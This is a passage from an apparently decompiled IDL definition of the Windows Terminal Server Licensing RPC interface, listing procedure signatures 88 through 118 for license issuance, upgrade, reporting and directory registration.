        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc88_TLSRpcRemoveLocalGroupForGP(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc89_TLSRpcCanLSUpdateAD(
        [in][context_handle] void* arg_0,
        [in][string] wchar_t* arg_1,
        [out]long* arg_2,
        [out]long* arg_3);

    error_status_t Proc90_TLSRpcAddLStoTSLSofDC(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc91_TLSRpcRemoveLSFromTSLSOfAD(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc92_TLSRpcIsLSonDC(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc93_TLSRpcDatabasePath(
        [in][context_handle] void* arg_0,
        [in][out][string]/*[range(0,512)]*/  wchar_t* arg_1,
        [in][out]/*[range(0,512)] */long* arg_2,
        [out]long* arg_3);

    error_status_t Proc94_TLSRpcIsUserAdmin(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc95_TLSRpcIsPreventUpgGPEnabled(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc96_TLSRpcUpgradeLicenseWithMarkExEx(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]char* arg_2,
        [in]long arg_3,
        [in]long arg_4,
        [in][ref][size_is(arg_4)]/*[range(0,0)]*/ byte* arg_5,
        [in][range(0, 16384)] long arg_6,
        [in][ref][size_is(arg_6)]/*[range(0,16384)]*/ byte* arg_7,
        [in]long arg_8,
        [out]long* arg_9,
        [out][ref]/*[range(0,0)]*/ byte** arg_10,
        [in][out]long* arg_11,
        [out]long* arg_12);

    error_status_t Proc97_TLSRpcRegisterToSCP(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc98_TLSRpcUnRegisterFromSCP(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc99_TLSRpcIsSCPRegistered(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc100_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out]/*[range(0,16384)]*/ char * arg_2,
        [out]long* arg_3);

    error_status_t Proc101_TLSRpcRegisterLicenseKeyPackEx(
        [in][context_handle] void* arg_0,
        [in][ref][size_is(arg_2)]/*[range(0,0)]*/ byte* arg_1,
        [in]long arg_2,
        [in][ref][size_is(arg_4)]/*[range(0,0)]*/ byte* arg_3,
        [in]long arg_4,
        [in][ref][size_is(arg_6)]/*[range(0,0)]*/ byte* arg_5,
        [in]long arg_6,
        [out]char* arg_7,
        [out]long* arg_8);

    error_status_t Proc102_TLSRpcTelephoneRegisterLKPEx(
        [in][context_handle] void* arg_0,
        [in][range(0, 16384)] long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,16384)]*/ byte* arg_2,
        [out]char* arg_3,
        [out]long* arg_4);

    error_status_t Proc103_TLSRpcUnRegisterLicenses(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in]long arg_2,
        [out]long* arg_3);

    error_status_t Proc104_TLSRpcGetOSVersion(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1);

    error_status_t Proc105_TLSRpcLogEvent(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in][string] wchar_t* arg_3);

    error_status_t Proc106_TLSRpcUpgradeLicenseV4(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]char* arg_2,
        [in]long arg_3,
        [in]long arg_4,
        [in][ref][size_is(arg_4)]/*[range(0,0)]*/ byte* arg_5,
        [in][range(0, 16384)] long arg_6,
        [in][ref][size_is(arg_6)]/*[range(0,16384)]*/ byte* arg_7,
        [in]long arg_8,
        [out]long* arg_9,
        [out][ref]/*[range(0,0)]*/ byte** arg_10,
        [in][out]long* arg_11,
        [in][string][size_is(33)]/*[range(0,0)]*/  wchar_t* arg_12,
        [out]long* arg_13);

    error_status_t Proc107_TLSRequestNewLicense(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]long arg_2,
        [in]char* arg_3,
        [in][string] wchar_t* arg_4,
        [in][string] wchar_t* arg_5,
        [in][range(0, 16384)] long arg_6,
        [in][ref][size_is(arg_6)]/*[range(0,16384)]*/ byte* arg_7,
        [in]long arg_8,
        [in]long arg_9,
        [in][out]long* arg_10,
        [out]long* arg_11,
        [out][ref]/*[range(0,0)]*/ byte** arg_12,
        [in][out]long* arg_13,
        [in]long arg_14);

    error_status_t Proc108_TLSRpcGetCHIDsForSupportedCALs(
        [in][context_handle] void* arg_0,
        [out]/*[range(0,16384)] */long* arg_1,
        [out][ref] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,16384)]*/  /*  */[string] wchar_t*** arg_2,
        [out]long* arg_3);

    error_status_t Proc109_TLSRpcGetCHIDsForSupportedCALsDelimited(
        [in][context_handle] void* arg_0,
        [out]/*[range(0,16384)] */long* arg_1,
        [out][ref][string] wchar_t** arg_2,
        [out]long* arg_3);

    error_status_t Proc110_TLSRpcGetSupportedFeatures(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc111_TLSRpcFetchReportNextEx(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,16384)]*/  /*  */ char * arg_2,
        [out]long* arg_3);

    error_status_t Proc112_TLSRpcFetchReportCALInfoNextEx(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,16384)]*/  /*  */ char * arg_2,
        [out]long* arg_3);

    error_status_t Proc113_TLSRpcConvertLicenses(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [out]long* arg_3,
        [out]long* arg_4);

    error_status_t Proc114_TLSRpcFetchReportEntriesDetail(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out]/*[range(0,16384)]*/ char * arg_2,
        [out]long* arg_3);

    error_status_t Proc115_TLSRpcFetchReportFailedPUSummaryEntries(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,16384)]*/  /*  */ char * arg_2,
        [out]long* arg_3);

    error_status_t Proc116_TLSRpcFetchReportNext_PD(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,16384)]*/  /*  */ char * arg_2,
        [out]long* arg_3);

    error_status_t Proc117_TLSRpcIssuePerUserLicenseEx(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]char* arg_2,
        [in][range(0, 16384)] long arg_3,
        [in][ref][size_is(arg_3)]/*[range(0,16384)]*/ byte* arg_4,
        [in]long arg_5,
        [out]long* arg_6,
        [out][ref]/*[range(0,0)]*/ byte** arg_7,
        [in][string] wchar_t* arg_8,
        [in][string] wchar_t* arg_9,
        [in][string] wchar_t* arg_10,
        [in][out]long* arg_11);

    error_status_t Proc118_TLSRpcConfigHighAvailability(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [out]long* arg_2,
        [out][ref][string]/*[range(0,0)]*/  wchar_t** arg_3,
        [out]long* arg_4);
}